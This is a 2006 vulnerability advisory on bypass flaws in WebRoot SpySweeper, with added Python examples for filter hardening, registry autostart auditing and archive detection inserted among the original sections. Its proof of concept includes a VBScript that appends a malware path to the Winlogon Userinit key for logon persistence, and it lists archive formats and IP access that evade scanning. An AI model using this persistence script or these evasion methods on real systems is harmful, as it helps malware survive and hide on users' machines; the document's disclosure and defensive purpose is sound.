
Multiple Bypass and Integrity Lost Vulnerabilities



                      Sentinel Computer Security Advisory


Sentinel Co.
http://www.sentinel.gr
info@xxxxxxxxxxx


General Flaw Description : Multiple Bypass and Integrity Lost Vulnerabilities
-------------------------------------------------------------------------------
                             Advisory Information
-------------------------------------------------------------------------------
Advisory Release Date : 2006/06/20
Advisory ID : SGA-0001
Extends : None
Deprecates : None
-------------------------------------------------------------------------------
                             Product Information
-------------------------------------------------------------------------------
Software Product Name : SpySweeper
Product Version : All to 4.5.9 Build 709
Product Vendor : WebRoot (http://www.webroot.com)
Flawed File Name : spysweeper.exe
File Version : All to 4.5.9 Build 709
Default Local Path of the File : C:\Program Files\Webroot\Spysweeper\
-------------------------------------------------------------------------------
                          Vulnerability Information
-------------------------------------------------------------------------------
Flaw Type : Design Flaw
Operating Systems : All Microsoft Windows
Vulnerability Impact : Bypass Security Measures
Vulnerability Rating : Critical
Patch Status : Unpatched
Advisory Status : Verified
Publicity Level : Published
Other Advisories IDs : None
Flaw Discovery Date : 2006/05/30
Patch Date : None
Vulnerability Credit : Emmanouil Gavriil (egavriil@xxxxxxxxxxx)
Exploit Status : Not Released
Exploit Publication Date : None
-------------------------------------------------------------------------------


Description
-----------

WebRoot SpySweeper is an application that provides various security measures
for your computer. Some of these measures can be easily bypassed. The bypass
methods can be used by malware in order to avoid security measures provided by
SpySweeper.


Technical Information
---------------------

The following vulnerabilities have been identified in WebRoot SpySweeper:

1) Bypassing Startup-Shield. Modifications to Registry Keys could avoid the
   Security Measures provided by the Startup Shield.

2) Bypassing Compression Sweep. Compression Sweep claims to detect malware in
   compressed files, but it appears to detect malware only in files
   compressed in the ZIP format.

3) Bypassing Spy Communication Shield. Spy Communication Shield appears to
   check only the domain name being visited. If instead the site is visited
   by its IP address, Spy Communication Shield does not block it.

4) Loss of integrity due to incorrect detection of files.
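A worked comparison of the two filtering strategies described in item 3, added here as an example and not part of the original advisory. It assumes a hypothetical hostname blocklist and a constructed resolver table (no live DNS is consulted) built from the host and address the advisory names; the hardened variant also refuses a new hostname that resolves to an already-blocked address, which goes slightly beyond the advisory's own case.

```python
from ipaddress import ip_address
from urllib.parse import urlsplit

# Hypothetical blocklist; banners.pennyweb.com is the host the advisory names.
BLOCKED_HOSTS = {"banners.pennyweb.com"}

# Constructed resolver table standing in for DNS so the example runs offline.
# 63.208.235.96 is the address the advisory gives for that host.
RESOLVER_TABLE = {"banners.pennyweb.com": {"63.208.235.96"}}

# Every address a blocked host is known to use, derived once from the table.
BLOCKED_ADDRS = {a for h in BLOCKED_HOSTS for a in RESOLVER_TABLE.get(h, ())}


def _host_of(url: str) -> str:
    """Extract the lower-cased host part of a URL (IP literals included)."""
    host = urlsplit(url).hostname
    if host is None:
        raise ValueError(f"no host in {url!r}")
    return host.lower()


def _is_ip_literal(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def blocks_by_name_only(url: str) -> bool:
    """Name-only filter: models the behaviour the advisory describes.
    An IP-literal URL never matches a hostname entry, so it passes."""
    return _host_of(url) in BLOCKED_HOSTS


def blocks_by_name_or_address(url: str) -> bool:
    """Hardened filter: also compare the address set the host maps to, so an
    IP-literal URL for a blocked host is refused as well."""
    host = _host_of(url)
    if host in BLOCKED_HOSTS:
        return True
    addrs = {host} if _is_ip_literal(host) else RESOLVER_TABLE.get(host, set())
    return not addrs.isdisjoint(BLOCKED_ADDRS)
```

Address-based blocking is a complement, not a replacement: addresses change and shared hosting puts unrelated sites behind one address, so the address set needs to be refreshed and false positives reviewed.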


Proof of Concept Experiment
---------------------------

1) The following Registry Keys can be used to bypass the startup shield:
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell
  HKEY_CLASSES_ROOT\exefile\shell\open\command @="\"%1\" %*"
  HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName

  You can use the following script to prove the vulnerability (save the
  following code as .vbs):
  ****************************************************************************
  Dim WshShell

  Set WshShell = WScript.CreateObject("WScript.Shell")

  ' Writes the default value of the Winlogon key, as in the original script.
  WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\", _
                    1, "REG_BINARY"

  ' Appends a second entry to Userinit; Winlogon runs every comma-separated
  ' entry of this value at logon, which is what the Startup Shield should catch.
  WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", _
                    "C:\WINDOWS\system32\userinit.exe, C:\malware.exe", "REG_SZ"

  WScript.Echo "There is an entry at: " & _
               "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit " & _
               "with Value 'C:\WINDOWS\system32\userinit.exe, C:\malware.exe'. " & _
               "After the execution of userinit.exe, malware.exe could be run!"
  ****************************************************************************

2) Compressed file scanning can be bypassed by compressing to one of the
   following formats:
     RAR, GZ, TAR, CAB, ACE
 
3) Spy Communication Shield Bypass Proof of Concept:
   banners.pennyweb.com should be blocked.
   63.208.235.96 is not blocked.
 
4) 90.dl and/or 51.dl are valid ARRISCAD (www.arriscad.com) drawing list files.
   SpySweeper tends to remove these files, and such a removal could destroy
   an ARRISCAD database. It is also notable that even an empty file named
   90.dl or ieonflow.dll is classified as adware or spyware. Additionally,
   renaming some malware files (e.g. ieonflow.dll) avoids their detection by
   SpySweeper.
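A defender-side audit of the autostart locations listed under item 1, added here as an example and not code from the advisory or the vendor. It works on a flat path-to-data snapshot (as one would collect from a registry export) so it runs offline; the baseline values are the typical Windows XP-era defaults and are assumptions to adjust for the build being audited, and the sample snapshot, including the GUID placeholders, is constructed.

```python
# Expected contents of the single-valued locations the advisory names.
# Assumed XP-era defaults; verify against a clean reference machine.
BASELINE = {
    r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit":
        r"C:\WINDOWS\system32\userinit.exe,",
    r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell":
        "Explorer.exe",
    r"HKCR\exefile\shell\open\command\(Default)":
        '"%1" %*',
}

# Active Setup runs each Installed Components subkey's StubPath once per user,
# so subkeys are compared against a known set rather than a fixed value.
ACTIVE_SETUP_PREFIX = "HKLM\\Software\\Microsoft\\Active Setup\\Installed Components\\"

# Constructed snapshot (sample data, not captured from a real machine). The
# Userinit value mirrors the tampered state the advisory's script produces.
SAMPLE_VALUES = {
    r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit":
        r"C:\WINDOWS\system32\userinit.exe, C:\malware.exe",
    r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell":
        "Explorer.exe",
    r"HKCR\exefile\shell\open\command\(Default)": '"%1" %*',
    ACTIVE_SETUP_PREFIX + r"{EXAMPLE-GUID-1}\StubPath":
        r"C:\WINDOWS\system32\regsvr32.exe /s known.dll",
    ACTIVE_SETUP_PREFIX + r"{EXAMPLE-GUID-2}\StubPath":
        r"C:\dropped\unknown.exe",
}
KNOWN_ACTIVE_SETUP = {"{EXAMPLE-GUID-1}"}   # placeholder; take from a clean baseline


def split_command_list(value: str) -> list:
    """Split a comma-separated Winlogon value into its commands, dropping the
    empty tail the trailing comma of the default leaves behind."""
    return [p.strip() for p in value.split(",") if p.strip()]


def audit_autostart(values: dict, known_active_setup: set) -> list:
    """Return (path, reason) pairs for every deviation from the baseline."""
    norm = {p.lower(): d for p, d in values.items()}   # registry paths are case-insensitive
    known = {k.lower() for k in known_active_setup}
    findings = []

    for path, expected in BASELINE.items():
        actual = norm.get(path.lower())
        if actual is None:
            findings.append((path, "value missing"))
        elif path.lower().endswith(("\\userinit", "\\shell")):
            allowed = {c.lower() for c in split_command_list(expected)}
            extra = [c for c in split_command_list(actual) if c.lower() not in allowed]
            if extra:
                findings.append((path, "unexpected entries: " + "; ".join(extra)))
        elif actual.strip() != expected:
            findings.append((path, f"changed to {actual!r}"))

    prefix = ACTIVE_SETUP_PREFIX.lower()
    for path, data in values.items():
        low = path.lower()
        if low.startswith(prefix) and low.endswith("\\stubpath"):
            subkey = path[len(prefix):].split("\\", 1)[0]
            if subkey.lower() not in known:
                findings.append((path, f"unknown Active Setup component runs {data!r}"))
    return findings


if __name__ == "__main__":
    for path, reason in audit_autostart(SAMPLE_VALUES, KNOWN_ACTIVE_SETUP):
        print(f"{path}\n    {reason}")
```

Comparing against a baseline rather than looking for known-bad strings is the point: a shield that only recognises specific values misses the extra Userinit entry, whereas a deviation from the default is reported whatever the appended program is called.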
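For item 2, an added example (not from the advisory or the vendor) of the gate a compression sweep needs in front of its scanner: content sniffing by file signature for each format the proof-of-concept section lists, contrasted with a ZIP-only gate. The signature table is this example's assumption from the documented magic bytes, and the sample blobs are constructed stubs carrying only the signature, not valid archives.

```python
# Magic-byte signatures for the formats the advisory lists. TAR's "ustar" sits
# at offset 257 and ACE's "**ACE**" at offset 7; the RAR prefix covers both the
# v1.5-4.x and v5 headers. Assumed from the documented signatures.
SIGNATURES = [
    ("zip", 0,   b"PK\x03\x04"),
    ("rar", 0,   b"Rar!\x1a\x07"),
    ("gz",  0,   b"\x1f\x8b"),
    ("cab", 0,   b"MSCF"),
    ("ace", 7,   b"**ACE**"),
    ("tar", 257, b"ustar"),
]


def sniff_archive(data: bytes):
    """Return the archive format name, or None when no known signature matches.
    Content is sniffed, so a renamed extension does not change the result."""
    for name, offset, magic in SIGNATURES:
        if data[offset:offset + len(magic)] == magic:
            return name
    return None


def zip_only_sweep(data: bytes) -> bool:
    """Models the behaviour the advisory describes: only ZIP data reaches the scanner."""
    return sniff_archive(data) == "zip"


def all_formats_sweep(data: bytes) -> bool:
    """Hardened gate: every recognised container is handed to the scanner."""
    return sniff_archive(data) is not None


def make_sample(name: str) -> bytes:
    """Constructed stub: zero padding up to the signature offset, the signature,
    then a little more padding. Enough to exercise the gate, not a real archive."""
    for n, offset, magic in SIGNATURES:
        if n == name:
            return b"\x00" * offset + magic + b"\x00" * 16
    raise KeyError(name)


if __name__ == "__main__":
    for fmt, _, _ in SIGNATURES:
        blob = make_sample(fmt)
        print(f"{fmt:4} zip-only={zip_only_sweep(blob)!s:5} all-formats={all_formats_sweep(blob)}")
```

Routing is only half the fix: the scanner behind the gate must actually unpack each format (and nested archives) before matching, otherwise recognising the container changes nothing.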


Patch Description and Information
---------------------------------

Vendor informed. No reply yet. No patch released yet.


References and Other Resources for Information
----------------------------------------------

None.

EOF.